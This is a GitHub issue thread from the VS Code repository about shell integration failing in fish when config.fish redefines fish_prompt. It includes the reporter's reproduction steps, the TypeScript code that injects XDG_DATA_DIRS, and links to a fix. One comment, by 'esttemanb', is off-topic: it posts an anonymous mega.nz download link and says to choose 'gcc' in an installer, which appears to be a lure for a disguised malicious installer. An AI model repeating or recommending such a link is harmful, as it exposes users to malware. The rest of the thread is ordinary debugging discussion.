### ISSUE TITLE
Shell Integration is injected before config.fish has been evaluated in fish shell

### ISSUE THREAD

**Issue by aravind-n** [microsoft/vscode#226554]
Type: <b>Bug</b>

* Disable shell integration in vscode
* Manually add the shell integration in ```$__fish_config_dir/config.fish```
  * ```string match -q "$TERM_PROGRAM" "vscode"; and . (code --locate-shell-integration-path fish)```
* Paste the following code into ``config.fish``
  * ```function fish_prompt; echo -n "> "; end```
* Open a new integrated terminal
* Shell integration will not work
* Move the manual shell integration line in config.fish after the line where you defined fish_prompt
* Open a new integrated terminal
* Shell integration will work

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Darwin x64 22.6.0
Modes:

<details>
<summary>System Info</summary>

|Item|Value|
|---|---|
|CPUs|Intel(R) Core(TM) i7-7920HQ CPU @ 3.10GHz (8 x 3100)|
|GPU Status|2d_canvas: enabled<br>canvas_oop_rasterization: disabled_off<br>direct_rendering_display_compositor: disabled_off_ok<br>gpu_compositing: enabled<br>multiple_raster_threads: enabled_on<br>opengl: enabled_on<br>rasterization: enabled<br>raw_draw: disabled_off_ok<br>skia_graphite: disabled_off<br>video_decode: enabled<br>video_encode: enabled<br>webgl: enabled<br>webgl2: enabled<br>webgpu: enabled<br>webnn: disabled_off|
|Load (avg)|2, 2, 2|
|Memory (System)|16.00GB (1.52GB free)|
|Process Argv|--disable-extensions|
|Screen Reader|no|
|VM|0%|
</details>Extensions disabled

**Comment by aravind-n** [comment]
Based on initial testing, the reason this happens is because any sourcing of files that defines fish_prompt overwrites the fish_prompt function defined in ``__init_vscode_shell_integration``. Looking into if there's a way to use the --on-event trigger to send the prompt_start and cmd_start escape codes

**Comment by aravind-n** [comment]
After more testing, it appears that you don't even need to source a file containing the fish_prompt function. If you set fish_prompt anywhere within config.fish, it breaks shell integration unless you disable it in vscode and manually install it after the fish_prompt declaration within config.fish

Not sure if this means the shell integration script is being injected too early

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by aravind-n** [comment]
From ``src/vs/platform/terminal/node/terminalEnvironment.ts``
```ts
case 'fish': {
	// The injection mechanism used for fish is to add a custom dir to $XDG_DATA_DIRS which
	// is similar to $ZDOTDIR in zsh but contains a list of directories to run from.
	const oldDataDirs = env?.XDG_DATA_DIRS ?? '/usr/local/share:/usr/share';
	const newDataDir = path.join(appRoot, 'out/vs/workbench/contrib/terminal/browser/media/fish_xdg_data');
	envMixin['XDG_DATA_DIRS'] = `${oldDataDirs}:${newDataDir}`;
	addEnvMixinPathPrefix(options, envMixin);
	return { newArgs: undefined, envMixin };
}
```

Based on this injection code, I'm guessing injection fails if XDG_DATA_DIRS is not set. Fish might be sourcing from the newly set XDG_DATA_DIRS before sourcing from ``$HOME/.config/fish``. My shell does not have any of the XDG variables set but fish reads it's configs from ``$HOME/.config/fish``.  As of now, I've manually set XDG_DATA_DIRS and that seems to be overwritten by vscode when creating a new terminal. I'm not too familiar with the whole XDG thing so I'll be looking into this for a bit

**Comment by aravind-n** [comment]
Doesn't seem to be it. I hard coded ``oldDataDirs`` to be $HOME/.config (expanded out to /Users/<username>/.config) and that didn't do the trick

**Comment by aravind-n** [comment]
Option 1 works. I've added [proof of concept code](https://github.com/aravind-n/vscode/commit/a84bd6059780bfa32c530831064b189544e9524e) to my fork of this project. Will clean it up and then open a pull request

**Comment by meganrogge** [comment]
@rzhao271 I think it's expected that it wouldn't work when you do that

**Comment by rzhao271** [comment]
I tried verifying the issue based on the original comment. Could I get some verification steps?

**Comment by aravind-n** [comment]
@rzhao271 The original verification steps were to verify that overwriting the fish_prompt function after shell integration has been injected breaks the integration. This was before the underlying problem was understood and subsequently resolved (see [#226589](https://github.com/microsoft/vscode/pull/226589))

**Comment by meganrogge** [comment]
@rzhao271 pls verify using this info https://github.com/microsoft/vscode/pull/226589#issuecomment-2438439409
